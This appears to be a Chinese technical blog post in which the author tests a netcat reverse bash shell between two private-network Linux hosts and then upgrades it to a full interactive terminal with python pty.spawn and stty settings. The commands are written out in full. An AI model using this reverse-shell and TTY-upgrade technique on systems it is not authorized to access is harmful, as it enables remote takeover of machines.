​[20230310]nc reverse bash shell問題.txt

lfree發表於2023-03-10

[20230310]nc reverse bash shell問題.txt

--//測試nc reverse bash shell遇到的問題,補充說明一下:
--//192.168.100.78  linux
$ nc -l  1234

--//192.168.100.235  linux
$ nc 192.168.100.78 1234 -e '/bin/bash -i'

--//192.168.100.78  linux
$ nc -l  1234
hostname
LIS-DB

--//缺點就是命令給盲打,沒有提示符,不支援tab,上下鍵選擇命令.
--//參考連結 :

--//192.168.100.78  linux
--//根據python的版本選擇執行方式.
--//for python2
python -c 'import pty; pty.spawn("/bin/bash")'
--//for python3
python3 -c 'import pty; pty.spawn("/bin/bash")'

--//這樣可以出現提示符,相當於啟動一個新的bash shell.但是許多問題依舊,按下ctrl+z,退出前臺bash shell.
--//進入前臺執行:
$ echo $TERM
screen

$ stty -a
speed 38400 baud; rows 0; columns 0; line = 0;
                  ~~~~~~~~~~~~~~~~~~~~
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; flush = ^O; min = 1; time = 0;
-parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -cdtrdsr
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke
--//記下TERM,以及rows 和 columns值.然後關閉回顯.
$ stty raw -echo

--//你可以進入前執行: stty raw -echo ; nc -l 1234,這樣執行的缺點是執行如下命令要盲打(根本看不見),操作最好的方式是copy and paste.
python -c 'import pty; pty.spawn("/bin/bash")'

--//實際上你不按ctrl+z,另外開一個會話檢視對應環境引數.
--//192.168.100.78  linux

$ echo $TERM
screen

$ stty -a
speed 38400 baud; rows 77; columns 271; line = 0;
                  ~~~~~~~~~~~~~~~~~~~~
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; flush = ^O; min = 1; time = 0;
-parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -cdtrdsr
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke

--//按fg返回到前臺執行如下:
reset
export SHELL=bash
export TERM=screen
stty rows 77 columns 271

--//這樣一切就正常了,tab,上下鍵都可以正常使用,命令也不會回顯.甚至vim也可以正常使用.
--//注意退出要執行2次exit命令,回到前臺bash shell,會出現一些顯示問題,再次執行reset就沒事了.
--//實際上本地問題在於這樣登入後,是一個dumop tty.打入tty結果如下.
tty
not a tty


--//順便講一下,連結 http://blog.itpub.net/267265/search/rever/ =>[20210908]Reverse Shell with Bash.txt
--//類似問題,也可以這樣解決.


來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/267265/viewspace-2939167/,如需轉載,請註明出處,否則將追究法律責任。

相關文章